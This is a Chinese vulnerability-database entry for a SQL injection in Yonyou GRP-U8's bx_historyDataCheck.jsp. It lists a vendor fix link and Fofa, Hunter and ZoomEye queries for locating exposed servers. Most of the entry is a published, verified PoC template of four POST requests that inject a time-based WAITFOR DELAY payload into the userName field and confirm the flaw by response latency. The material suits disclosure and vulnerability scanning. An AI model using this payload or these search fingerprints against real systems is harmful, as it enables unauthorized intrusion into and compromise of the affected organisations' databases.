yonyou-grp-u8-bx_historyDataChecks-sqli: 用友GRP-U8 bx_historyDataCheck.jsp SQL注入漏洞

日期: 2025-09-01 | 影响软件: 用友GRP U8 | POC: 已公开

漏洞描述

用友GRP-U8 /u8qx/bx_historyDataCheck.jsp SQL注入漏洞 修复方法:https://security.yonyou.com/#/noticeInfo?id=379 Fofa: app="用友-GRP-U8" Hunter: app.name="用友GRP-U8 OA" ZoomEye: app:"用友GRP-U8"

PoC代码[已公开]

id: yonyou-grp-u8-bx_historyDataChecks-sqli

info:
  name: 用友GRP-U8 bx_historyDataCheck.jsp SQL注入漏洞
  author: Y3y1ng
  severity: high
  verified: true
  description: |-
    用友GRP-U8 /u8qx/bx_historyDataCheck.jsp SQL注入漏洞
    修复方法:https://security.yonyou.com/#/noticeInfo?id=379
    Fofa: app="用友-GRP-U8"
    Hunter: app.name="用友GRP-U8 OA"
    ZoomEye: app:"用友GRP-U8"
  reference:
    - https://mp.weixin.qq.com/s/BTDkd1y5J2-4BC9ilrdftA
  tags: yonyou,sqli
  created: 2023/09/22

rules:
  r0:
    request:
      method: POST
      path: /u8qx/bx_historyDataCheck.jsp
      body: userName=';WAITFOR DELAY '0:0:10'--&ysnd=&historyFlag=
    expression: response.status == 200 && response.latency <= 11000 &&  response.latency >= 10000
  r1:
    request:
      method: POST
      path: /u8qx/bx_historyDataCheck.jsp
      body: userName=';WAITFOR DELAY '0:0:6'--&ysnd=&historyFlag=
    expression: response.status == 200 && response.latency <= 7000 &&  response.latency >= 6000
  r2:
    request:
      method: POST
      path: /u8qx/bx_historyDataCheck.jsp
      body: userName=';WAITFOR DELAY '0:0:10'--&ysnd=&historyFlag=
    expression: response.status == 200 && response.latency <= 11000 &&  response.latency >= 10000
  r3:
    request:
      method: POST
      path: /u8qx/bx_historyDataCheck.jsp
      body: userName=';WAITFOR DELAY '0:0:6'--&ysnd=&historyFlag=
    expression: response.status == 200 && response.latency <= 7000 &&  response.latency >= 6000
expression: r0() && r1() && r2() && r3()

相关漏洞推荐